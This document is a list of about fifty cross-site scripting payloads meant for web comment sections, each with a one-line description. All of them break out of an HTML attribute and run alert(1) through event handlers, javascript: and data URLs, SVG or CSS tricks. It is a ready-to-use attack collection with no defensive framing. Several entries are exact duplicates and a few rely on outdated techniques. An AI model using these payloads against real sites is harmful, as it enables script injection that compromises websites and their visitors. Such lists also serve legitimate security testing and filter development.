For-Comments Section

# XSS Payloads for Comments Section

`"><svg/onload=alert(1)>` : SVG tag with onload event to trigger JavaScript.
`"><img src=x onerror=alert(1)>` : Image tag with onerror event to execute JavaScript.
`"><script>alert(1)</script>` : Simple script tag to execute JavaScript.
`"><iframe src="javascript:alert(1)"></iframe>` : Iframe tag with JavaScript source to execute alert.
`"><input type="text" value="<script>alert(1)</script>">` : Input field with embedded script tag.
`"><body onload=alert(1)>` : Body tag with onload event to execute JavaScript.
`"><img src=x onerror="this.onerror=null;alert(1)">` : Image tag with self-nullifying onerror event.
`"><audio src=x onerror=alert(1)>` : Audio tag with onerror event to trigger JavaScript.
`"><video src=x onerror=alert(1)>` : Video tag with onerror event to execute alert.
`"><marquee onstart=alert(1)>` : Marquee tag with onstart event to execute JavaScript.
`"><object data="data:text/html,<script>alert(1)</script>"></object>` : Object tag with data URL containing JavaScript.
`"><embed src="data:text/html,<script>alert(1)</script>">` : Embed tag with data URL containing JavaScript.
`"><form action="javascript:alert(1)"><input type="submit"></form>` : Form tag with action attribute set to JavaScript.
`"><link rel="stylesheet" href="javascript:alert(1)">` : Link tag with href attribute set to JavaScript.
`"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script>` : SVG tag with CDATA section to execute JavaScript.
`"><math><maction xlink:href="javascript:alert(1)">click</maction></math>` : MathML tag with xlink attribute for JavaScript.
`"><meta http-equiv="refresh" content="0;url=javascript:alert(1)">` : Meta tag with refresh attribute set to JavaScript.
`"><input type="button" onclick=alert(1) value="Click me">` : Input button with onclick event to trigger alert.
`"><textarea onfocus=alert(1) autofocus>` : Textarea with onfocus event to execute JavaScript.
`"><select onfocus=alert(1) autofocus><option>1</option></select>` : Select element with onfocus event to execute alert.
`"><svg><use xlink:href="javascript:alert(1)"></use></svg>` : SVG use tag with xlink attribute set to JavaScript.
`"><div style="width: expression(alert(1));">` : Div tag with CSS expression to execute JavaScript.
`"><a href="javascript:alert(1)">Click me</a>` : Anchor tag with href attribute set to JavaScript.
`"><input type="image" src="javascript:alert(1);">` : Input image with src attribute set to JavaScript.
`"><form><button formaction="javascript:alert(1)">Submit</button></form>` : Form with button formaction attribute set to JavaScript.
`"><img src=x onerror="alert(String.fromCharCode(88,83,83))">` : Image tag with onerror event using String.fromCharCode to execute alert.
`"><iframe src="data:text/html,<script>alert(1)</script>"></iframe>` : Iframe with data URL containing JavaScript.
`"><script>alert(1)//` : Script tag with single-line comment to break out of attributes.
`"><svg/onmouseover=alert(1)>` : SVG tag with onmouseover event to execute JavaScript.
`"><div onclick=alert(1)>Click me</div>` : Div tag with onclick event to trigger alert.
`"><meta content="text/html; charset=UTF-7"><script>alert(1)</script>` : Meta tag with charset attribute set to UTF-7.
`"><img src=x onmouseover=alert(1)>` : Image tag with onmouseover event to execute alert.
`"><div style="background:url('javascript:alert(1)')">` : Div tag with CSS background URL containing JavaScript.
`"><svg/onmouseenter=alert(1)>` : SVG tag with onmouseenter event to execute JavaScript.
`"><svg/onmouseleave=alert(1)>` : SVG tag with onmouseleave event to execute JavaScript.
`"><svg/onfocus=alert(1)>` : SVG tag with onfocus event to execute JavaScript.
`"><svg/onblur=alert(1)>` : SVG tag with onblur event to execute JavaScript.
`"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div>` : Div tag with id, style, and onclick attributes to trigger alert.
`"><div style="background:url(javascript:alert(1));">` : Div tag with CSS background URL containing JavaScript.
`"><div style="width: expression(alert(1));">` : Div tag with CSS expression to execute JavaScript.
`"><img src=x:alert(1) onerror=eval(src)>` : Image tag with eval in onerror attribute to execute JavaScript.
`"><svg><use xlink:href="javascript:alert(1)"></use></svg>` : SVG use tag with xlink attribute set to JavaScript.
`"><object data="data:text/html,<script>alert(1)</script>"></object>` : Object tag with data URL containing JavaScript.
`"><embed src="data:text/html,<script>alert(1)</script>">` : Embed tag with data URL containing JavaScript.
`"><input type="text" value='1 & onmouseover="alert(1)" autofocus>` : Input field with onmouseover event to execute JavaScript.
`"><img src=x onerror=alert(String.fromCharCode(88,83,83))>` : Image tag with onerror event using String.fromCharCode to execute alert.
`"><iframe src="data:text/html,<script>alert(1)</script>"></iframe>` : Iframe with data URL containing JavaScript.
`"><script src="data:text/javascript,alert(1);"></script>` : Script tag with data URL containing JavaScript.